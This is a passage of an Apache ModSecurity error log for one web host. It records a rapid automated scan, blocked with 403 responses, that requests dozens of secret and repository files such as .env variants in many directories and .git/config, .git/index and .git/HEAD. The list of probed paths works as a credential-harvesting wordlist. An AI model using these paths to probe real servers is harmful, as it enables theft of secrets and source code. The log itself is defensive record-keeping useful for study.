14350] [client 172.70.251.103:10635] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/var/www/.env"] [unique_id "abze3LR4r1NodKcenf6pdwAAAIY"] [Fri Mar 20 07:45:00.075000 2026] [:error] [pid 17713:tid 17805] [client 172.70.251.104:10165] [client 172.70.251.104] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/var/www/html/.env"] [unique_id "abze3OWNdVzdR4d4e6YX3AAAAQ8"] [Fri Mar 20 07:45:00.076205 2026] [:error] [pid 17713:tid 17812] [client 172.70.250.214:14229] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/home/.env"] [unique_id "abze3OWNdVzdR4d4e6YX3QAAARY"] [Fri Mar 20 07:45:00.077693 2026] [:error] [pid 17713:tid 17792] [client 172.70.250.214:14234] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/root/.env"] [unique_id "abze3OWNdVzdR4d4e6YX3gAAAQI"] [Fri Mar 20 07:45:00.081432 2026] [:error] [pid 14299:tid 14333] [client 172.70.251.147:12155] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env_config"] [unique_id "abze3IgHLbuvz2RS3ZspYgAAAEM"] [Fri Mar 20 07:45:00.088771 2026] [:error] [pid 17713:tid 17796] [client 172.70.251.103:10641] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env_secret"] [unique_id "abze3OWNdVzdR4d4e6YX4AAAAQY"] [Fri Mar 20 07:45:00.090291 2026] [:error] [pid 17713:tid 17803] [client 172.70.251.148:12609] [client 172.70.251.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/docker/.env"] [unique_id "abze3OWNdVzdR4d4e6YX4QAAAQ0"] [Fri Mar 20 07:45:00.091344 2026] [:error] [pid 17713:tid 17797] [client 172.70.251.103:10629] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.local.backup"] [unique_id "abze3OWNdVzdR4d4e6YX4gAAAQc"] [Fri Mar 20 07:45:00.101612 2026] [:error] [pid 26363:tid 26397] [client 172.70.251.148:12613] [client 172.70.251.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/server/.env"] [unique_id "abze3N4YyF1e-QDujo9tNgAAAUA"] [Fri Mar 20 07:45:00.105294 2026] [:error] [pid 26363:tid 26403] [client 172.70.250.215:9491] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.git/HEAD"] [unique_id "abze3N4YyF1e-QDujo9tNwAAAUY"] [Fri Mar 20 07:45:00.111674 2026] [:error] [pid 26363:tid 26405] [client 172.70.250.215:9492] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.git/config"] [unique_id "abze3N4YyF1e-QDujo9tOAAAAUg"] [Fri Mar 20 07:45:00.111914 2026] [:error] [pid 17713:tid 17791] [client 172.70.251.147:11958] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.git/index"] [unique_id "abze3OWNdVzdR4d4e6YX4wAAAQE"] [Fri Mar 20 07:45:00.113640 2026] [:error] [pid 14299:tid 14363] [client 172.70.251.103:9741] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.git/logs/HEAD"] [unique_id "abze3IgHLbuvz2RS3ZspYwAAAFM"] [Fri Mar 20 07:45:00.122521 2026] [:error] [pid 26363:tid 26397] [client 172.70.251.148:12617] [client 172.70.251.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env_settings"] [unique_id "abze3N4YyF1e-QDujo9tOQAAAUA"] [Fri Mar 20 07:45:00.124124 2026] [:error] [pid 26363:tid 26412] [client 172.70.251.147:11960] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.git/refs/heads/master"] [unique_id "abze3N4YyF1e-QDujo9tOgAAAU8"] [Fri Mar 20 07:45:00.126097 2026] [:error] [pid 14299:tid 14352] [client 172.70.251.103:9741] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env"] [unique_id "abze3IgHLbuvz2RS3ZspZAAAAE0"] [Fri Mar 20 07:45:00.127342 2026] [:error] [pid 14425:tid 14439] [client 172.70.251.148:12623] [client 172.70.251.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.git/refs/heads/main"] [unique_id "abze3EMqeKc_GzeuAXANyQAAAMw"] [Fri Mar 20 07:45:00.134933 2026] [:error] [pid 14425:tid 14437] [client 172.70.251.103:9747] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.local"] [unique_id "abze3EMqeKc_GzeuAXANygAAAMo"] [Fri Mar 20 07:45:00.136433 2026] [:error] [pid 14299:tid 14361] [client 172.70.251.103:9749] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.production"] [unique_id "abze3IgHLbuvz2RS3ZspZgAAAFI"] [Fri Mar 20 07:45:00.136438 2026] [:error] [pid 14299:tid 14375] [client 172.70.251.103:9741] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.dev"] [unique_id "abze3IgHLbuvz2RS3ZspZQAAAFg"] [Fri Mar 20 07:45:00.144958 2026] [:error] [pid 26363:tid 26404] [client 172.70.251.104:11639] [client 172.70.251.104] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.development"] [unique_id "abze3N4YyF1e-QDujo9tOwAAAUc"] [Fri Mar 20 07:45:00.147187 2026] [:error] [pid 17713:tid 17808] [client 172.70.251.147:11958] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.backup"] [unique_id "abze3OWNdVzdR4d4e6YX5QAAARI"] [Fri Mar 20 07:45:00.148161 2026] [:error] [pid 17713:tid 17809] [client 172.70.251.104:11642] [client 172.70.251.104] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.test"] [unique_id "abze3OWNdVzdR4d4e6YX5gAAARM"] [Fri Mar 20 07:45:00.148950 2026] [:error] [pid 26363:tid 26415] [client 172.70.250.215:9491] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.old"] [unique_id "abze3N4YyF1e-QDujo9tPAAAAVI"] [Fri Mar 20 07:45:00.149110 2026] [:error] [pid 26363:tid 26411] [client 172.70.251.147:11960] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.bak"] [unique_id "abze3N4YyF1e-QDujo9tPQAAAU4"] [Fri Mar 20 07:45:00.149192 2026] [:error] [pid 17713:tid 17799] [client 172.70.251.103:9753] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.staging"] [unique_id "abze3OWNdVzdR4d4e6YX5wAAAQk"] [Fri Mar 20 07:45:00.158550 2026] [:error] [pid 14425:tid 14427] [client 172.70.251.148:12623] [client 172.70.251.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.save"] [unique_id "abze3EMqeKc_GzeuAXANywAAAMA"] [Fri Mar 20 07:45:00.161643 2026] [:error] [pid 26363:tid 26418] [client 172.70.250.215:9492] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.example"] [unique_id "abze3N4YyF1e-QDujo9tPgAAAVU"] [Fri Mar 20 07:45:00.161673 2026] [:error] [pid 14425:tid 14447] [client 172.70.251.103:9747] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.tmp"] [unique_id "abze3EMqeKc_GzeuAXANzAAAANQ"] [Fri Mar 20 07:45:00.161721 2026] [:error] [pid 26363:tid 26416] [client 172.70.250.215:9491] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.development.local"] [unique_id "abze3N4YyF1e-QDujo9tPwAAAVM"] [Fri Mar 20 07:45:00.161782 2026] [:error] [pid 14299:tid 14340] [client 172.70.251.103:9749] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.production.local"] [unique_id "abze3IgHLbuvz2RS3ZspaAAAAEg"] [Fri Mar 20 07:45:00.171920 2026] [:error] [pid 14299:tid 14345] [client 172.70.251.103:9741] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/app/.env"] [unique_id "abze3IgHLbuvz2RS3ZspaQAAAEo"] [Fri Mar 20 07:45:00.171921 2026] [:error] [pid 17713:tid 17807] [client 172.70.250.215:9493] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/config/.env"] [unique_id "abze3OWNdVzdR4d4e6YX6AAAARE"] [Fri Mar 20 07:45:00.176154 2026] [:error] [pid 26363:tid 26419] [client 172.70.250.215:9492] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/api/.env"] [unique_id "abze3N4YyF1e-QDujo9tQQAAAVY"] [Fri Mar 20 07:45:00.176154 2026] [:error] [pid 26363:tid 26408] [client 172.70.250.215:9491] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backend/.env"] [unique_id "abze3N4YyF1e-QDujo9tQAAAAUs"] [Fri Mar 20 07:45:00.185457 2026] [access_compat:error] [pid 14425:tid 14444] [client 172.70.250.214:11558] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Fri Mar 20 07:45:00.186521 2026] [:error] [pid 26363:tid 26402] [client 172.70.251.104:11639] [client 172.70.251.104] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/private/.env"] [unique_id "abze3N4YyF1e-QDujo9tQgAAAUU"] [Fri Mar 20 07:45:00.186521 2026] [:error] [pid 17713:tid 17798] [client 172.70.250.215:9500] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/admin/.env"] [unique_id "abze3OWNdVzdR4d4e6YX6gAAAQg"] [Fri Mar 20 07:45:00.186521 2026] [:error] [pid 17713:tid 17793] [client 172.70.250.215:9493] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/public/.env"] [unique_id "abze3OWNdVzdR4d4e6YX6QAAAQM"] [Fri Mar 20 07:45:00.188517 2026] [:error] [pid 17713:tid 17811] [client 172.70.251.147:11958] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/config/env"] [unique_id "abze3OWNdVzdR4d4e6YX6wAAARU"] [Fri Mar 20 07:45:00.188546 2026] [:error] [pid 26363:tid 26407] [client 172.70.250.215:9491] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/config/.env.local"] [unique_id "abze3N4YyF1e-QDujo9tQwAAAUo"] [Fri Mar 20 07:45:00.197003 2026] [:error] [pid 26363:tid 26399] [client 172.70.250.215:9492] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.php"] [unique_id "abze3N4YyF1e-QDujo9tRAAAAUI"] [Fri Mar 20 07:45:00.198986 2026] [:error] [pid 26363:tid 26406] [client 